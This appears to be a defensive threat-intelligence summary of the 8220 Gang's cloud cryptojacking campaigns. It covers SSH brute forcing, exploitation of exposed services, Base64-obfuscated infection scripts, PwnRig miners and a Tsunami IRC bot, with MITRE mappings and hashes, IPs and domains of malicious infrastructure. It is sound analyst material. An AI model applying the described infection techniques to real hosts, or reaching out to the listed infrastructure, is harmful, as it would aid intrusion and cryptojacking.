8220 Gang is a low-skill crimeware actor known for infecting cloud hosts via SSH brute forcing and exposed services. The article walks through an educational SOC investigation of the group’s infection script, payloads, and infrastructure to help analysts track the threat and understand attacker objectives. #8220Gang #PwnRig
Keypoints
- 8220 Gang targets cloud hosts by exploiting n-day vulnerabilities and using remote access brute forcing (SSH).
- Infections occur on publicly accessible cloud hosts (AWS, Azure, GCP, Aliyun, QCloud) running Docker, Confluence, WebLogic, and Redis.
- An initial discovery involved a simple infection script with a known SHA1 hash, observable via honeypots or malware feeds.
- The infection script uses multi-level Base64 encoding and downloads itself and a payload to achieve persistence (createservices function).
- lwp-download is used as a failover for wget/curl to download commands, showing standardized tool usage in the infection chain.
- Post-infection activity centers on deploying PwnRig miners and an IRC-based Tsunami bot, with infrastructure evolving across campaigns (including FBI-themed domains).
- Infrastructure tracking reveals clumsy, overlapping DNS/IP usage (e.g., 194.38.23.170, 185.106.94.146, dw.bpdeliver.ru, jira.letmaker.top, fbi.su1001-2.top) that aids attribution when combined with malware samples.
MITRE Techniques
- [T1110] Brute Force – “infecting cloud hosts through n-day vulnerabilities and remote access brute forcing.”
- [T1190] Exploit Public-Facing Application – “Victims using cloud infrastructure … are often infected via publicly accessible hosts running Docker, Confluence, Apache WebLogic, and Redis.”
- [T1059.004] Unix Shell (Command and Scripting Interpreter) – “lwp-download” and other commands used within shell scripts to download payloads.
- [T1105] Ingress Tool Transfer – “downloading and setting persistence of some other file” and payload delivery from malicious servers.
- [T1027] Obfuscated/Compressed Files and Information – “multiple levels of Base64 encoding… hiding the fact that it is also downloading a specific payload.”
- [T1543] Create/Modify System Process – “set persistence on the victim machine by downloading itself from malicious servers.”
- [T1071.004] Application Layer Protocol: IRC – “the Tsunami sample” and IRC bot communications observed in post-infection activity.
Indicators of Compromise
- [SHA1] a9da0947243333d95f84f6a0e37b9fc29b2fb054 – 8220 Gang Install Script
- [SHA1] 472548a4b8295182f6ba8641d74725c2250b7243 – 8220 Gang Bashirc.x86_64 – PackedOld version, “Tsunami”
- [SHA1] 38be55f1fc4ce1cb5438236abc5077019e5e1cdf – 8220 Gang X86_64 – Packed MinerUses fbi.su1001-2.top
- [SHA1] 332485bd460f55117a254f8164736b90d74aa9f6 – e2c3e. Unpacked, PwnRig Miner
- [IP] 194.38.23.170 – 8220 Gang Infrastructure – Shared
- [IP] 185.106.94.146 – 8220 Gang Infrastructure
- [IP] 79.137.203.156 – 8220 Gang Infrastructure
- [Domain] jira.letmaker.top – 8220 Gang Infrastructure – Reused
- [Domain] dw.bpdeliver.ru – 8220 Gang Infrastructure – Recent
- [Domain] fbi.su1001-2.top – 8220 Gang Infrastructure – Recent